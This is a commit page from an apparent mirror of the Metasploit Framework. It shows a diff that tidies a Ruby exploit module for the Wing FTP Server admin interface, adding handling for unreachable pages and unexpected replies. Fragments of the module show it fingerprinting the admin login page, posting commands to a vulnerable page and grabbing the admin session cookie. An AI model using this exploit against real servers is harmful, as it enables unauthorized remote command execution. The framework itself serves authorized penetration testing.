1
mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-29 18:07:27 +01:00

Removed unused require and import. Handle the res.nil case in

execute_command() and authenticate().
This commit is contained in:
Nicholas Nam 2014-08-28 10:30:30 -07:00
parent 40b66fae33
commit 0788ce9745

View File

@ -4,10 +4,8 @@
##
require 'msf/core'
require 'msf/core/exploit/powershell'
class Metasploit3 < Msf::Exploit::Remote
include REXML
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::HttpClient
@ -22,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Author' =>
[
'Nicholas Nam (nick[at]executionflow.org)',
'Nicholas Nam <nick[at]executionflow.org>',
],
'License' => MSF_LICENSE,
'References' =>
@ -54,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_cgi(
{
'uri' => '/admin_login.html',
'method' => 'GET',
'method' => 'GET'
})
if res and res.body =~ /Wing FTP Server Administrator/ and res.body =~ /2003-2014 <b>wftpserver.com<\/b>/
@ -84,8 +82,10 @@ class Metasploit3 < Msf::Exploit::Remote
'vars_post' => { 'command' => command }
})
if res and res.code != 200
fail_with(Failure::Unknown, "#{peer} - Something went wrong.")
if !res
fail_with(Failure::Unreachable, "#{peer} - Vulnerable page was unreachable.")
elsif res.code != 200
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP Response Code.")
end
end
@ -104,7 +104,9 @@ class Metasploit3 < Msf::Exploit::Remote
})
uidadmin = ''
if res and res.body =~ /location='main.html\?lang=english';/
if !res
fail_with(Failure::Unreachable, "#{peer} - Admin login page was unreachable.")
elsif res.code == 200 and res.body =~ /location='main.html\?lang=english';/
res.get_cookies.split(';').each do |cookie|
cookie.split(',').each do |value|
if value.split('=')[0] =~ /UIDADMIN/